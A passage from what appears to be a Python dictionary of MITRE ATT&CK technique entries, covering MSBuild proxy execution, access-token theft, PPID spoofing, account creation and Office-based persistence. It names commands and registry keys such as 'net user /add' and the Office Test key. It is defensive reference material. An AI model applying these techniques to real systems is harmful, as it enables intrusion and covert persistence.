           'name': 'Trusted Developer Utilities Proxy Execution',
           'platforms': ['Windows']},
 'T1127.001': {'attack_id': 'T1127.001',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may use MSBuild to proxy execution of code through a trusted Windows '
                              'utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by '
                              'Visual Studio. It handles XML formatted project files that define requirements for '
                              'loading and building various platforms and configurations.(Citation: MSDN MSBuild)\n'
                              '\n'
                              'Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task '
                              'capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual '
                              'Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: '
                              'Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. '
                              'MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute '
                              'arbitrary code and bypass application control defenses that are configured to allow '
                              'MSBuild.exe execution.(Citation: LOLBAS Msbuild)',
               'name': 'MSBuild',
               'platforms': ['Windows']},
 'T1129': {'attack_id': 'T1129',
           'categories': ['execution'],
           'description': 'Adversaries may execute malicious payloads via loading shared modules. Shared modules are '
                          'executable files that are loaded into processes to provide access to reusable code, such as '
                          'specific custom functions or invoking OS API functions (i.e., [Native '
                          'API](https://attack.mitre.org/techniques/T1106)).\n'
                          '\n'
                          'Adversaries may use this functionality as a way to execute arbitrary payloads on a victim '
                          'system. For example, adversaries can modularize functionality of their malware into shared '
                          'objects that perform various functions such as managing C2 network communications or '
                          'execution of specific actions on objective.\n'
                          '\n'
                          'The Linux & macOS module loader can load and execute shared objects from arbitrary local '
                          'paths. This functionality resides in `dlfcn.h` in functions such as `dlopen` and `dlsym`. '
                          'Although macOS can execute `.so` files, common practice uses `.dylib` files.(Citation: '
                          'Apple Dev Dynamic Libraries)(Citation: Linux Shared Libraries)(Citation: RotaJakiro 2021 '
                          'netlab360 analysis)(Citation: Unit42 OceanLotus 2017)\n'
                          '\n'
                          'The Windows module loader can be instructed to load DLLs from arbitrary local paths and '
                          'arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in '
                          '`NTDLL.dll` and is part of the Windows [Native '
                          'API](https://attack.mitre.org/techniques/T1106) which is called from functions like '
                          '`LoadLibrary` at run time.(Citation: Microsoft DLL)',
           'name': 'Shared Modules',
           'platforms': ['Windows', 'macOS', 'Linux']},
 'T1132': {'attack_id': 'T1132',
           'categories': ['command-and-control'],
           'description': 'Adversaries may encode data to make the content of command and control traffic more '
                          'difficult to detect. Command and control (C2) information can be encoded using a standard '
                          'data encoding system. Use of data encoding may adhere to existing protocol specifications '
                          'and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character '
                          'encoding systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia '
                          'Character Encoding) Some data encoding systems may also result in data compression, such as '
                          'gzip.',
           'name': 'Data Encoding',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1132.001': {'attack_id': 'T1132.001',
               'categories': ['command-and-control'],
               'description': 'Adversaries may encode data with a standard data encoding system to make the content of '
                              'command and control traffic more difficult to detect. Command and control (C2) '
                              'information can be encoded using a standard data encoding system that adheres to '
                              'existing protocol specifications. Common data encoding schemes include ASCII, Unicode, '
                              'hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: '
                              'Wikipedia Character Encoding) Some data encoding systems may also result in data '
                              'compression, such as gzip.',
               'name': 'Standard Encoding',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1132.002': {'attack_id': 'T1132.002',
               'categories': ['command-and-control'],
               'description': 'Adversaries may encode data with a non-standard data encoding system to make the '
                              'content of command and control traffic more difficult to detect. Command and control '
                              '(C2) information can be encoded using a non-standard data encoding system that diverges '
                              'from existing protocol specifications. Non-standard data encoding schemes may be based '
                              'on or related to standard data encoding schemes, such as a modified Base64 encoding for '
                              'the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) '
                              '(Citation: Wikipedia Character Encoding) ',
               'name': 'Non-Standard Encoding',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1133': {'attack_id': 'T1133',
           'categories': ['persistence', 'initial-access'],
           'description': 'Adversaries may leverage external-facing remote services to initially access and/or persist '
                          'within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow '
                          'users to connect to internal enterprise network resources from external locations. There '
                          'are often remote service gateways that manage connections and credential authentication for '
                          'these services. Services such as [Windows Remote '
                          'Management](https://attack.mitre.org/techniques/T1021/006) and '
                          '[VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: '
                          'MacOS VNC software for Remote Desktop)\n'
                          '\n'
                          'Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is '
                          'often a requirement, which could be obtained through credential pharming or by obtaining '
                          'the credentials from users after compromising the enterprise network.(Citation: Volexity '
                          'Virtual Private Keylogging) Access to remote services may be used as a redundant or '
                          'persistent access mechanism during an operation.\n'
                          '\n'
                          'Access may also be gained through an exposed service that doesn’t require authentication. '
                          'In containerized environments, this may include an exposed Docker API, Kubernetes API '
                          'server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro '
                          'Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)',
           'name': 'External Remote Services',
           'platforms': ['Windows', 'Linux', 'Containers', 'macOS']},
 'T1134': {'attack_id': 'T1134',
           'categories': ['defense-evasion', 'privilege-escalation'],
           'description': 'Adversaries may modify access tokens to operate under a different user or system security '
                          'context to perform actions and bypass access controls. Windows uses access tokens to '
                          'determine the ownership of a running process. A user can manipulate access tokens to make a '
                          'running process appear as though it is the child of a different process or belongs to '
                          'someone other than the user that started the process. When this occurs, the process also '
                          'takes on the security context associated with the new token.\n'
                          '\n'
                          'An adversary can use built-in Windows API functions to copy access tokens from existing '
                          'processes; this is known as token stealing. These token can then be applied to an existing '
                          'process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) '
                          'or used to spawn a new process (i.e. [Create Process with '
                          'Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a '
                          'privileged user context (i.e. administrator) to steal a token. However, adversaries '
                          'commonly use token stealing to elevate their security context from the administrator level '
                          'to the SYSTEM level. An adversary can then use a token to authenticate to a remote system '
                          'as the account for that token if the account has appropriate permissions on the remote '
                          'system.(Citation: Pentestlab Token Manipulation)\n'
                          '\n'
                          'Any standard user can use the <code>runas</code> command, and the Windows API functions, to '
                          'create impersonation tokens; it does not require access to an administrator account. There '
                          'are also other mechanisms, such as Active Directory fields, that can be used to modify '
                          'access tokens.',
           'name': 'Access Token Manipulation',
           'platforms': ['Windows']},
 'T1134.001': {'attack_id': 'T1134.001',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': "Adversaries may duplicate then impersonate another user's existing token to escalate "
                              'privileges and bypass access controls. For example, an adversary can duplicate an '
                              'existing token using `DuplicateToken` or `DuplicateTokenEx`.(Citation: DuplicateToken '
                              'function) The token can then be used with `ImpersonateLoggedOnUser` to allow the '
                              "calling thread to impersonate a logged on user's security context, or with "
                              '`SetThreadToken` to assign the impersonated token to a thread.\n'
                              '\n'
                              'An adversary may perform [Token '
                              'Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a '
                              'specific, existing process they want to assign the duplicated token to. For example, '
                              'this may be useful for when the target user has a non-network logon session on the '
                              'system.\n'
                              '\n'
                              'When an adversary would instead use a duplicated token to create a new process rather '
                              'than attaching to an existing process, they can additionally [Create Process with '
                              'Token](https://attack.mitre.org/techniques/T1134/002) using `CreateProcessWithTokenW` '
                              'or `CreateProcessAsUserW`. [Token '
                              'Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct '
                              'from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in '
                              'that it refers to duplicating an existing token, rather than creating a new one.',
               'name': 'Token Impersonation/Theft',
               'platforms': ['Windows']},
 'T1134.002': {'attack_id': 'T1134.002',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may create a new process with an existing token to escalate privileges and '
                              'bypass access controls. Processes can be created with the token and resulting security '
                              'context of another user using features such as <code>CreateProcessWithTokenW</code> and '
                              '<code>runas</code>.(Citation: Microsoft RunAs)\n'
                              '\n'
                              'Creating processes with a token not associated with the current user may require the '
                              'credentials of the target user, specific privileges to impersonate that user, or access '
                              'to the token to be used. For example, the token could be duplicated via [Token '
                              'Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or created via '
                              '[Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) before '
                              'being used to create a process.\n'
                              '\n'
                              'While this technique is distinct from [Token '
                              'Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001), the techniques can '
                              'be used in conjunction where a token is duplicated and then used to create a new '
                              'process.',
               'name': 'Create Process with Token',
               'platforms': ['Windows']},
 'T1134.003': {'attack_id': 'T1134.003',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may make new tokens and impersonate users to escalate privileges and bypass '
                              'access controls. For example, if an adversary has a username and password but the user '
                              'is not logged onto the system the adversary can then create a logon session for the '
                              'user using the `LogonUser` function.(Citation: LogonUserW function) The function will '
                              "return a copy of the new session's access token and the adversary can use "
                              '`SetThreadToken` to assign the token to a thread.\n'
                              '\n'
                              'This behavior is distinct from [Token '
                              'Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers '
                              'to creating a new user token instead of stealing or duplicating an existing one.',
               'name': 'Make and Impersonate Token',
               'platforms': ['Windows']},
 'T1134.004': {'attack_id': 'T1134.004',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may spoof the parent process identifier (PPID) of a new process to evade '
                              'process-monitoring defenses or to elevate privileges. New processes are typically '
                              'spawned directly from their parent, or calling, process unless explicitly specified. '
                              'One way of explicitly assigning the PPID of a new process is via the '
                              '<code>CreateProcess</code> API call, which supports a parameter that defines the PPID '
                              'to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by '
                              'Windows features such as User Account Control (UAC) to correctly set the PPID after a '
                              'requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> '
                              'or <code>consent.exe</code>) rather than the current user context.(Citation: Microsoft '
                              'UAC Nov 2018)\n'
                              '\n'
                              'Adversaries may abuse these mechanisms to evade defenses, such as those blocking '
                              'processes spawning directly from Office documents, and analysis targeting '
                              'unusual/potentially malicious parent-child process relationships, such as spoofing the '
                              'PPID of '
                              '[PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) '
                              'to be <code>explorer.exe</code> rather than an Office document delivered as part of '
                              '[Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: '
                              'CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual '
                              'Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office '
                              'document or any code that can perform [Native '
                              'API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar '
                              '2019)(Citation: CounterCept PPID Spoofing Dec 2018)\n'
                              '\n'
                              'Explicitly assigning the PPID may also enable elevated privileges given appropriate '
                              'access rights to the parent process. For example, an adversary in a privileged user '
                              'context (i.e. administrator) may spawn a new process and assign the parent as a process '
                              'running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be '
                              'elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)',
               'name': 'Parent PID Spoofing',
               'platforms': ['Windows']},
 'T1134.005': {'attack_id': 'T1134.005',
               'categories': ['defense-evasion', 'privilege-escalation'],
               'description': 'Adversaries may use SID-History Injection to escalate privileges and bypass access '
                              'controls. The Windows security identifier (SID) is a unique value that identifies a '
                              'user or group account. SIDs are used by Windows security in both security descriptors '
                              'and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the '
                              'SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), '
                              'allowing inter-operable account migration between domains (e.g., all values in '
                              'SID-History are included in access tokens).\n'
                              '\n'
                              'With Domain Administrator (or equivalent) rights, harvested or well-known SID values '
                              '(Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to '
                              'enable impersonation of arbitrary users/groups such as Enterprise Administrators. This '
                              'manipulation may result in elevated access to local resources and/or access to '
                              'otherwise inaccessible domains via lateral movement techniques such as [Remote '
                              'Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin '
                              'Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote '
                              'Management](https://attack.mitre.org/techniques/T1021/006).',
               'name': 'SID-History Injection',
               'platforms': ['Windows']},
 'T1135': {'attack_id': 'T1135',
           'categories': ['discovery'],
           'description': 'Adversaries may look for folders and drives shared on remote systems as a means of '
                          'identifying sources of information to gather as a precursor for Collection and to identify '
                          'potential systems of interest for Lateral Movement. Networks often contain shared network '
                          'drives and folders that enable users to access file directories on various systems across a '
                          'network. \n'
                          '\n'
                          'File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia '
                          'Shared Resource) (Citation: TechNet Shared Folder) '
                          '[Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for '
                          'available shared drives using the <code>net view \\\\\\\\remotesystem</code> command. It '
                          'can also be used to query shared drives on the local system using <code>net share</code>. '
                          'For macOS, the <code>sharing -l</code> command lists all shared points used for smb '
                          'services.',
           'name': 'Network Share Discovery',
           'platforms': ['macOS', 'Windows', 'Linux']},
 'T1136': {'attack_id': 'T1136',
           'categories': ['persistence'],
           'description': 'Adversaries may create an account to maintain access to victim systems.(Citation: Symantec '
                          'WastedLocker June 2020) With a sufficient level of access, creating such accounts may be '
                          'used to establish secondary credentialed access that do not require persistent remote '
                          'access tools to be deployed on the system.\n'
                          '\n'
                          'Accounts may be created on the local system or within a domain or cloud tenant. In cloud '
                          'environments, adversaries may create accounts that only have access to specific services, '
                          'which can reduce the chance of detection.',
           'name': 'Create Account',
           'platforms': ['Windows',
                         'Azure AD',
                         'Office 365',
                         'IaaS',
                         'Linux',
                         'macOS',
                         'Google Workspace',
                         'Network',
                         'Containers',
                         'SaaS']},
 'T1136.001': {'attack_id': 'T1136.001',
               'categories': ['persistence'],
               'description': 'Adversaries may create a local account to maintain access to victim systems. Local '
                              'accounts are those configured by an organization for use by users, remote support, '
                              'services, or for administration on a single system or service. \n'
                              '\n'
                              'For example, with a sufficient level of access, the Windows <code>net user /add</code> '
                              'command can be used to create a local account. On macOS systems the <code>dscl '
                              '-create</code> command can be used to create a local account. Local accounts may also '
                              'be added to network devices, often via common [Network Device '
                              'CLI](https://attack.mitre.org/techniques/T1059/008) commands such as '
                              '<code>username</code>, or to Kubernetes clusters using the `kubectl` utility.(Citation: '
                              'cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)\n'
                              '\n'
                              'Such accounts may be used to establish secondary credentialed access that do not '
                              'require persistent remote access tools to be deployed on the system.',
               'name': 'Local Account',
               'platforms': ['Linux', 'macOS', 'Windows', 'Network', 'Containers']},
 'T1136.002': {'attack_id': 'T1136.002',
               'categories': ['persistence'],
               'description': 'Adversaries may create a domain account to maintain access to victim systems. Domain '
                              'accounts are those managed by Active Directory Domain Services where access and '
                              'permissions are configured across systems and services that are part of that domain. '
                              'Domain accounts can cover user, administrator, and service accounts. With a sufficient '
                              'level of access, the <code>net user /add /domain</code> command can be used to create a '
                              'domain account.(Citation: Savill 1999)\n'
                              '\n'
                              'Such accounts may be used to establish secondary credentialed access that do not '
                              'require persistent remote access tools to be deployed on the system.',
               'name': 'Domain Account',
               'platforms': ['Windows', 'macOS', 'Linux']},
 'T1136.003': {'attack_id': 'T1136.003',
               'categories': ['persistence'],
               'description': 'Adversaries may create a cloud account to maintain access to victim systems. With a '
                              'sufficient level of access, such accounts may be used to establish secondary '
                              'credentialed access that does not require persistent remote access tools to be deployed '
                              'on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 '
                              'Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create '
                              'Cloud Identity Users)(Citation: Microsoft Azure AD Users)\n'
                              '\n'
                              'In addition to user accounts, cloud accounts may be associated with services. Cloud '
                              'providers handle the concept of service accounts in different ways. In Azure, service '
                              'accounts include service principals and managed identities, which can be linked to '
                              'various resources such as OAuth applications, serverless functions, and virtual '
                              'machines in order to grant those resources permissions to perform various activities in '
                              'the environment.(Citation: Microsoft Entra ID Service Principals) In GCP, service '
                              'accounts can also be linked to specific resources, as well as be impersonated by other '
                              'accounts for [Temporary Elevated Cloud '
                              'Access](https://attack.mitre.org/techniques/T1548/005).(Citation: GCP Service Accounts) '
                              'While AWS has no specific concept of service accounts, resources can be directly '
                              'granted permission to assume roles.(Citation: AWS Instance Profiles)(Citation: AWS '
                              'Lambda Execution Role)\n'
                              '\n'
                              'Adversaries may create accounts that only have access to specific cloud services, which '
                              'can reduce the chance of detection.\n'
                              '\n'
                              'Once an adversary has created a cloud account, they can then manipulate that account to '
                              'ensure persistence and allow access to additional resources - for example, by adding '
                              '[Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) or '
                              'assigning [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).',
               'name': 'Cloud Account',
               'platforms': ['Azure AD', 'Office 365', 'IaaS', 'Google Workspace', 'SaaS']},
 'T1137': {'attack_id': 'T1137',
           'categories': ['persistence'],
           'description': 'Adversaries may leverage Microsoft Office-based applications for persistence between '
                          'startups. Microsoft Office is a fairly common application suite on Windows-based operating '
                          'systems within an enterprise network. There are multiple mechanisms that can be used with '
                          'Office for persistence when an Office-based application is started; this can include the '
                          'use of Office Template Macros and add-ins.\n'
                          '\n'
                          'A variety of features have been discovered in Outlook that can be abused to obtain '
                          'persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) '
                          'These persistence mechanisms can work within Outlook or be used through Office '
                          '365.(Citation: TechNet O365 Outlook Rules)',
           'name': 'Office Application Startup',
           'platforms': ['Windows', 'Office 365']},
 'T1137.001': {'attack_id': 'T1137.001',
               'categories': ['persistence'],
               'description': 'Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised '
                              'system. Microsoft Office contains templates that are part of common Office applications '
                              'and are used to customize styles. The base templates within the application are used '
                              'each time an application starts. (Citation: Microsoft Change Normal Template)\n'
                              '\n'
                              'Office Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be '
                              'inserted into the base template and used to execute code when the respective Office '
                              'application starts in order to obtain persistence. Examples for both Word and Excel '
                              'have been discovered and published. By default, Word has a Normal.dotm template created '
                              'that can be modified to include a malicious macro. Excel does not have a template file '
                              'created by default, but one can be added that will automatically be loaded.(Citation: '
                              'enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may '
                              'also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) \n'
                              '\n'
                              'Word Normal.dotm location:<br>\n'
                              '<code>C:\\Users\\&lt;username&gt;\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm</code>\n'
                              '\n'
                              'Excel Personal.xlsb location:<br>\n'
                              '<code>C:\\Users\\&lt;username&gt;\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB</code>\n'
                              '\n'
                              'Adversaries may also change the location of the base template to point to their own by '
                              "hijacking the application's search order, e.g. Word 2016 will first look for "
                              'Normal.dotm under <code>C:\\Program Files (x86)\\Microsoft '
                              'Office\\root\\Office16\\</code>, or by modifying the GlobalDotName registry key. By '
                              'modifying the GlobalDotName registry key an adversary can specify an arbitrary '
                              'location, file name, and file extension to use for the template that will be loaded on '
                              'application startup. To abuse GlobalDotName, adversaries may first need to register the '
                              'template as a trusted document or place it in a trusted location.(Citation: '
                              'GlobalDotName Jun 2019) \n'
                              '\n'
                              'An adversary may need to enable macros to execute unrestricted depending on the system '
                              'or enterprise security policy on use of macros.',
               'name': 'Office Template Macros',
               'platforms': ['Windows', 'Office 365']},
 'T1137.002': {'attack_id': 'T1137.002',
               'categories': ['persistence'],
               'description': 'Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain '
                              'persistence on a compromised system. An Office Test Registry location exists that '
                              'allows a user to specify an arbitrary DLL that will be executed every time an Office '
                              'application is started. This Registry key is thought to be used by Microsoft to load '
                              'DLLs for testing and debugging purposes while developing Office applications. This '
                              'Registry key is not created by default during an Office installation.(Citation: '
                              'Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)\n'
                              '\n'
                              'There exist user and global Registry keys for the Office Test feature, such as:\n'
                              '\n'
                              '* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Office test\\Special\\Perf</code>\n'
                              '* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Office test\\Special\\Perf</code>\n'
                              '\n'
                              'Adversaries may add this Registry key and specify a malicious DLL that will be executed '
                              'whenever an Office application, such as Word or Excel, is started.',
               'name': 'Office Test',
               'platforms': ['Windows', 'Office 365']},
 'T1137.003': {'attack_id': 'T1137.003',
               'categories': ['persistence'],
               'description': 'Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised '
                              'system. Outlook forms are used as templates for presentation and functionality in '
                              'Outlook messages. Custom Outlook forms can be created that will execute code when a '
                              'specifically crafted email is sent by an adversary utilizing the same custom Outlook '
                              'form.(Citation: SensePost Outlook Forms)\n'
                              '\n'
                              'Once malicious forms have been added to the user’s mailbox, they will be loaded when '
                              'Outlook is started. Malicious forms will execute when an adversary sends a specifically '
                              'crafted email to the user.(Citation: SensePost Outlook Forms)',
               'name': 'Outlook Forms',
               'platforms': ['Windows', 'Office 365']},
 'T1137.004': {'attack_id': 'T1137.004',
               'categories': ['persistence'],
               'description': "Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a "
                              'compromised system. Outlook Home Page is a legacy feature used to customize the '
                              'presentation of Outlook folders. This feature allows for an internal or external URL to '
                              'be loaded and presented whenever a folder is opened. A malicious HTML page can be '
                              'crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost '
                              'Outlook Home Page)\n'
                              '\n'
                              'Once malicious home pages have been added to the user’s mailbox, they will be loaded '
                              'when Outlook is started. Malicious Home Pages will execute when the right Outlook '
                              'folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)\n',
               'name': 'Outlook Home Page',
               'platforms': ['Windows', 'Office 365']},
 'T1137.005': {'attack_id': 'T1137.005',
               'categories': ['persistence'],
               'description': 'Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised '
                              'system. Outlook rules allow a user to define automated behavior to manage email '
                              'messages. A benign rule might, for example, automatically move an email to a particular '
                              'folder in Outlook if it contains specific words from a specific sender. Malicious '
                              'Outlook rules can be created that can trigger code execution when an adversary sends a '
                              'specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)\n'
                              '\n'
                              'Once malicious rules have been added to the user’s mailbox, they will be loaded when '
                              'Outlook is started. Malicious rules will execute when an adversary sends a specifically '
                              'crafted email to the user.(Citation: SilentBreak Outlook Rules)',
               'name': 'Outlook Rules',
               'platforms': ['Windows', 'Office 365']},
 'T1137.006': {'attack_id': 'T1137.006',
               'categories': ['persistence'],
               'description': 'Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised '
                              'system. Office add-ins can be used to add functionality to Office programs. (Citation: '
                              'Microsoft Office Add-ins) There are different types of add-ins that can be used by the '
                              'various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, '
                              'Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), '
                              'Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs '
                              'Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)\n'
                              '\n'
                              'Add-ins can be used to obtain persistence because they can be set to execute code when '
                              'an Office application starts. ',
               'name': 'Add-ins',
               'platforms': ['Windows', 'Office 365']},
 'T1140': {'attack_id': 'T1140',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may use [Obfuscated Files or '
                          'Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion '
                          'from analysis. They may require separate mechanisms to decode or deobfuscate that '
                          'information depending on how they intend to use it. Methods for doing that include built-in '
                          'functionality of malware or by using utilities present on the system.\n'
                          '\n'
                          'One such example is the use of [certutil](https://attack.mitre.org/software/S0160) to '
                          'decode a remote access tool portable executable file that has been hidden inside a '
                          'certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another '
                          'example is using the Windows <code>copy /b</code> command to reassemble binary fragments '
                          'into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)\n'
                          '\n'
                          "Sometimes a user's action may be required to open it for deobfuscation or decryption as "
                          'part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be '
                          'required to input a password to open a password protected compressed/encrypted file that '
                          'was provided by the adversary. (Citation: Volexity PowerDuke November 2016)',
           'name': 'Deobfuscate/Decode Files or Information',
           'platforms': ['Windows', 'Linux', 'macOS']},
 'T1149': {'attack_id': 'T1149',
           'categories': ['defense-evasion'],
           'description': '**This technique has been deprecated and should no longer be used.**\n'
                          '\n'
                          'As of OS X 10.8, mach-O binaries introduced a new header called LC_MAIN that points to the '
                          'binary’s entry point for execution. Previously, there were two headers to achieve this same '
                          'effect: LC_THREAD and LC_UNIXTHREAD  (Citation: Prolific OSX Malware History). The entry '
                          'point for a binary can be hijacked so that initial execution flows to a malicious addition '
                          '(either another section or a code cave) and then goes back to the initial entry point so '
                          'that the victim doesn’t know anything was different  (Citation: Methods of Mac Malware '
                          'Persistence). By modifying a binary in this way, application whitelisting can be bypassed '
                          'because the file name or application path is still the same.',
           'name': 'LC_MAIN Hijacking',
           'platforms': ['macOS']},
 'T1153': {'attack_id': 'T1153',
           'categories': ['execution'],
           'description': '**This technique has been deprecated and should no longer be used.**\n'
                          '\n'
                          'The <code>source</code> command loads functions into the current shell or executes files in '
                          'the current context. This built-in command can be run in two different ways <code>source '
                          '/path/to/filename [arguments]</code> or <code>.**This technique has been deprecated and '
                          'should no longer be used.** /path/to/filename [arguments]</code>. Take note of the space '
                          'after the ".". Without a space, a new shell is created that runs the program instead of '
                          'running the program within the current context. This is often used to make certain features '
                          "or functions available to a shell or to update a specific shell's environment.(Citation: "
                          'Source Manual)\n'
                          '\n'
                          'Adversaries can abuse this functionality to execute programs. The file executed with this '
                          'technique does not need to be marked executable beforehand.',
           'name': 'Source',
           'platforms': ['Linux', 'macOS']},
 'T1175': {'attack_id': 'T1175',
           'categories': ['lateral-movement', 'execution'],
           'description': '**This technique has been deprecated. Please use [Distributed Component Object '
                          'Model](https://attack.mitre.org/techniques/T1021/003) and [Component Object '
                          'Model](https://attack.mitre.org/techniques/T1559/001).**\n'
                          '\n'
                          'Adversaries may use the Windows Component Object Model (COM) and Distributed Component '
                          'Object Model (DCOM) for local code execution or to execute on remote systems as part of '
                          'lateral movement. \n'
                          '\n'
                          'COM is a component of the native Windows application programming interface (API) that '
                          'enables interaction between software objects, or executable code that implements one or '
                          'more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can '
                          'call methods of server objects, which are typically Dynamic Link Libraries (DLL) or '
                          'executables (EXE).(Citation: Microsoft COM) DCOM is transparent middleware that extends the '
                          'functionality of Component Object Model (COM) (Citation: Microsoft COM) beyond a local '
                          'computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June '
                          '2019)\n'
                          '\n'
                          'Permissions to interact with local and remote server COM objects are specified by access '
                          'control lists (ACL) in the Registry. (Citation: Microsoft COM ACL)(Citation: Microsoft '
                          'Process Wide Com Keys)(Citation: Microsoft System Wide Com Keys) By default, only '
                          'Administrators may remotely activate and launch COM objects through DCOM.\n'
                          '\n'
                          'Adversaries may abuse COM for local command and/or payload execution. Various COM '
                          'interfaces are exposed that can be abused to invoke arbitrary execution via a variety of '
                          'programming languages such as C, C++, Java, and VBScript.(Citation: Microsoft COM) Specific '
                          'COM objects also exists to directly perform functions beyond code execution, such as '
                          'creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless '
                          'download/execution, and other adversary behaviors such as Privilege Escalation and '
                          'Persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP '
                          'Apr 2018)\n'
                          '\n'
                          'Adversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the '
                          'context of an appropriately privileged user can remotely obtain arbitrary and even direct '
                          'shellcode execution through Office applications (Citation: Enigma Outlook DCOM Lateral '
                          'Movement Nov 2017) as well as other Windows objects that contain insecure '
                          'methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan '
                          '2017) DCOM can also execute macros in existing documents (Citation: Enigma Excel DCOM Sept '
                          '2017) and may also invoke [Dynamic Data '
                          'Exchange](https://attack.mitre.org/techniques/T1173) (DDE) execution directly through a COM '
                          'created instance of a Microsoft Office application (Citation: Cyberreason DCOM DDE Lateral '
                          'Movement Nov 2017), bypassing the need for a malicious document.',
           'name': 'Component Object Model and Distributed COM',
           'platforms': ['Windows']},
 'T1176': {'attack_id': 'T1176',
           'categories': ['persistence'],
           'description': 'Adversaries may abuse Internet browser extensions to establish persistent access to victim '
                          'systems. Browser extensions or plugins are small programs that can add functionality and '
                          'customize aspects of Internet browsers. They can be installed directly or through a '
                          "browser's app store and generally have access and permissions to everything that the "
                          'browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions '
                          'Definition)\n'
                          '\n'
                          'Malicious extensions can be installed into a browser through malicious app store downloads '
                          'masquerading as legitimate extensions, through social engineering, or by an adversary that '
                          'has already compromised a system. Security can be limited on browser app stores so it may '
                          'not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious '
                          'Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an '
                          "extension's update url to install updates from an adversary controlled server or manipulate "
